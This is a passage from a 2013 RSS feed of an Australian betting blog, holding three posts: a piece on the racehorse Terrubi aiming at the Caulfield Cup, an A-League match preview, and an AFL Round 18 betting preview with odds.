<p>A change of ownership to NSW-based Australian Bloodstock will see <b>Terrubi</b> make the trip Down Under this year, but you’d think he might have been headed to our soil anyway, especially after a good run in French races that has proved he’s coming to Australia with a little bit of form. Certainly, his new owners are excited about his Spring Season prospects – and in particular a chance at the Caulfield Cup – as you can tell from the tone of Australian Bloodstock’s own Jamie Lovett: ‘he certainly ticks all our boxes so we’re very happy to have him. We purchased him prior to the Group 2 at Longchamp Sunday week ago and obviously we were quite pleased by that result. He meets all the qualifying conditions now and, without speaking to Greg Carpenter yet to see where he fits, I would suggest he would get into a Caulfield Cup. Ideally he’s a nice horse for the spring but he could be an even better horse in the autumn and the following spring because he’s only lightly raced.’</p>
<p>So there you have it: look out for a new arrival in Australia to be targeting the Caulfield Cup in this year’s Spring Carnival, and get all the <a href="http://www.bet-au.com/horse-racing/" title="Racing Odds" target="_blank">Racing odds</a> for <b>Terrubi</b> by following the link&#8230;</p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Melbourne Victory v Brisbane Roar odds point to an epic Friday night battle on SBS</title>
		<link>http://www.bet-au.com/blog/melbourne-victory-v-brisbane-roar-odds-point-to-an-epic-friday-night-battle-on-sbs/</link>
		<comments>http://www.bet-au.com/blog/melbourne-victory-v-brisbane-roar-odds-point-to-an-epic-friday-night-battle-on-sbs/#comments</comments>
		<pubDate>Mon, 21 Oct 2013 03:35:21 +0000</pubDate>
		<dc:creator><![CDATA[G Waldorf]]></dc:creator>
				<category><![CDATA[Soccer]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[A-League]]></category>
		<category><![CDATA[A-League Tips]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=680</guid>
		<description><![CDATA[Last Friday night&#8217;s clash between Adelaide United and Melbourne Victory can quite rightly be deemed one of the A-League&#8217;s best ever offerings with victory scoring two goals late on to clinch a most deserved point. Refereeing skills lacked a long way behind footballing skills though Brisbane roar thumped Sydney FC at the weekend in a [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Last Friday night&#8217;s clash between Adelaide United and Melbourne Victory can quite rightly be deemed one of the A-League&#8217;s best ever offerings with victory scoring two goals late on to clinch a most deserved point. Refereeing skills lacked a long way behind footballing skills though<span id="more-680"></span></p>
<p>Brisbane roar thumped Sydney FC at the weekend in a game where a few pundits (us included) thought that the $4.50 available on Sydney FC was overs. Clearly it wasn&#8217;t as the Roar dismantled their opposition with ease.</p>
<p>Victory were equally as good away to Adelaide but the prospect of an impending managerial change will not help their preparation this week. So many draws in the A-League so far and we can see this clash going the same way at fair odds of <b><span class="alink">$3.25</span></b> on offer.</p>
<p>Don&#8217;t forget you can now watch all the A-League Friday night games live on free to air television on SBS or SBS2.</p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>AFL Round 18 Betting Preview</title>
		<link>http://www.bet-au.com/blog/afl-round-18-betting-preview/</link>
		<comments>http://www.bet-au.com/blog/afl-round-18-betting-preview/#comments</comments>
		<pubDate>Tue, 23 Jul 2013 11:23:30 +0000</pubDate>
		<dc:creator><![CDATA[TJ Dilfer]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[AFL]]></category>
		<category><![CDATA[AFL betting]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=487</guid>
		<description><![CDATA[The run in to the finals starts here, and there have already been plenty of pundits making predictions about how the ladder will look on the last day of the regular season. But the players and the coaches will be working hard not to look past the next game, and we recommend you do the [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>The run in to the finals starts here, and there have already been plenty of pundits making predictions about how the ladder will look on the last day of the regular season. But the players and the coaches will be <span id="more-487"></span>working hard not to look past the next game, and we recommend you do the same, looking at some of the odds on offer…</p>
<p>Friday night’s entertainment will be a clash between an <b>Essendon</b> side who will need to improve on last week’s performance, and a <b>Hawthorn</b> outfit who will be looking to come through without any injuries after a gruelling few weeks on the road, and who are facing a tough end to the season. The <b>Hawks</b> are favourites at <b><span class="alink">$1.36</span></b>, with <b>Essendon</b> getting <b><span class="alink">$3.15</span></b> from the bookies.</p>
<p>Elsewhere at the weekend, <b>Collingwood</b> at <b><span class="alink">$1.001</span></b> and <b>Geelong</b> at <b><span class="alink">$1.06</span></b> are both rightly strong favourites, but look out for a closer game between <b>Gold Coast</b> and <b>Carlton</b>, with <b>Carlton</b> at <b><span class="alink">$1.48</span></b> and <b>Gold Coast</b> at <b><span class="alink">$2.60</span></b>. We’ll be keeping an eye out on Sunday to see how <b>Richmond</b> and <b>Sydney</b> go, in a game that’ll have an impact near the top of the ladder. <b>Sydney</b> are <b><span class="alink">$1.24</span></b> favourites against <b>Richmond’s</b> <b><span class="alink">$4.00</span></b>&#8230;</p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
